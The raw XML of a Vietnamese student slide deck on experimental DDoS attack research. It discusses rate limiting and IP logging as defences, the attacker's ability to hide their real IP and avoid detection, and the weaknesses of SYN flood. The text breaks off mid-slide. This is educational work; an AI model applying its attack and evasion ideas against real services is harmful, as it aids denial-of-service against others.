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5" r:id="rId5"/>
    <p:sldId id="258" r:id="rId6"/>
    <p:sldId id="259" r:id="rId7"/>
    <p:sldId id="260" r:id="rId8"/>
    <p:sldId id="262" r:id="rId9"/>
    <p:sldId id="264" r:id="rId10"/>
    <p:sldId id="263"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16"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147298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121386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027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368351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1179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2969425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1541012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42687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427702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E803A-1D20-4A19-B763-EE7886416B8C}"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181536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E803A-1D20-4A19-B763-EE7886416B8C}"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111460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E803A-1D20-4A19-B763-EE7886416B8C}"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238211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E803A-1D20-4A19-B763-EE7886416B8C}"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3434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E803A-1D20-4A19-B763-EE7886416B8C}"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90007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E803A-1D20-4A19-B763-EE7886416B8C}"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9512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E803A-1D20-4A19-B763-EE7886416B8C}"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171D2-BF5F-4871-8A6D-97612E575CE8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="78298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BE803A-1D20-4A19-B763-EE7886416B8C}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/18/2024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0171D2-BF5F-4871-8A6D-97612E575CE8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3262571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register.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18a3-14-224-53-137.ngrok-free.app/register.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9B53-2FD7-4EFC-9D57-C1FD0B8668EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="285935"/>
            <a:ext cx="9144000" cy="2387600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0" err="1"/>
              <a:t>Nghiên</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0" err="1"/>
              <a:t>cứu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0" err="1"/>
              <a:t>thực</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0" err="1"/>
              <a:t>nghiệm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0" err="1"/>
              <a:t>tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0" err="1"/>
              <a:t>mạng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0"/>
              <a:t> DDOS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73C3991C-7DB0-4305-B6D0-C3F4BD614EDC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1389321" y="3205089"/>
            <a:ext cx="9144000" cy="1655762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Người</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thực</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hiện</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nghiên</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cứu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sinh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Nguyễn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Thành</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Lâm</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MSV:75DCTT11238 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>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27/9/2024</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Khoa: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nghệ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thông</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> tin </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Trường</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>đại</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>học</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nghệ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>giao</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thông</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vận</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tải</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3291990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CB139-F8E8-4646-B290-87B4D903EE2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="361507"/>
            <a:ext cx="10515600" cy="5815456"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Và</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>để</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>không</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bắt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nhầm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gói</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> tin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>được</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gửi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>từ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>người</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dùng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thật</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sự</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ta </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thực</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hiện</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>việc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tạo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>giới</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hạn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lượt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> request </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nếu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vượt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>quá</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>giới</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hạn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>đặt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ra ta </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thực</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hiện</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bắt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>các</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đó</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>và</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ghi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vào</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> log </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>với</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mục</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>đích</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>theo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>giõi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>có</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dấu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hiệu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mà</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ta </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nghi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ngờ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>Ư</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>điểm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>của</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>đội</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dễ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dàng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nhắm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>đến</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mục</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tiêu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>trên</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> internet, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vô</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tình</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>có</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>được</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tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>được</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tạo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ra </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>từ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>những</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nhà</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thử</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nghiệm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>có</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thể</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>che</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dấu</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thật</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tránh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bị</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>phát</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hiện</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Nhược</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>điểm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>của</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kiểu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> syn flood:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Qua </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>việc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>theo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dõi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>em</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thấy</a:t>
            </a:r>
